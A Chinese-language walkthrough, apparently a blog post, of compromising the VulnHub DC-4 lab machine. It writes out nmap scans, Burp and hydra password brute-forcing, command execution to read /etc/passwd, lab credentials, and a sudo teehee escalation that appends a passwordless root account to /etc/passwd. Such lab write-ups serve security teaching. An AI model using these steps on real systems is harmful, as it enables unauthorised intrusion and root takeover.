vulnhubDC-4渗透记录

环境配置:

靶机DC-4:

     192.168.220.156

攻击机kali:

     192.168.220.149

渗透过程:

与前几次一样使用nmap扫描出靶机的IP地址,再对靶机进行全面扫描

nmap -sP 192.168.220.0/24
nmap -A 192.168.220.156 -p 1-65535

可以看到开启了80端口和22ssh端口服务,可能涉及到爆破ssh

按照惯例先访问80端口:

使用burp工具的intruder模块进行爆破

开启burp代理,输入username 与 password 进行抓包:

将password字段进行爆破

进入payloads设置,字典使用john字典:

进入options,将线程设置为300:

点击start attack,开始爆破攻击:

爆破结果使用长度排序,发现一个302跳转,密码为happy

使用admin 密码happy登录

登陆成功,发现可以进入命令界面执行命令

命令为ls -l ,测试能否抓包改命令:

发送到repeater重放模块

本题中使用+代替空格,也可以不使用

使用命令查看passwd文件

cat /etc/passwd

发现有三个home目录下的用户

查看下三个用户的信息

ls /home/charles/
ls /home/jim/
ls /home/sam/

只有jim有内容,我们一个一个查看

在/home/jim/backups/中有一份老密码的备份文件,我们使用cat文件查看后复制出来保存成old_passwd.dic文件

其他的文件mbox文件夹中为空,test.sh内容没有用信息。

下一步思路,使用ssh爆破,这三个用户,使用刚拿到的old_passwd

hydra -L home_user.dic -P old_passwd.dic 192.168.220.156 ssh -vV -o hrdra.ssh
  指定用户字典和密码字典,并将结果存为hydra.ssh

显示一个成功,我们查看hydra.ssh文件

登录ssh:

ssh jim@192.168.220.156
jibril04

显示有邮件,先使用sudo -l 查看可以使用哪些命令:

jim无法使用sudo,这步不通,根据上面提示去查看下mail

发现charles的密码在这

我们尝试登录charles 密码^xHhA&hvim0y

使用sudo -l查看可以使用的命令:

发现一个teehee 为root权限,而且是NOPASSWD,使用这个提权

teehee:

我们使用-a 参数给/etc/passwd中添加一个root权限的用户

/etc/passwd 结构:

用户名:密码:UID(用户ID):GID(组ID):描述性信息:主目录:默认Shell
teehee -a /etc/passwd chigua::0:0:::/bin/bash
sudo teehee -a /etc/passwd
chigua::0:0:::/bin/bash

可以看到成功了:

使用su命令到chigua用户

Leave a Comment

您的电子邮箱地址不会被公开。 必填项已用*标注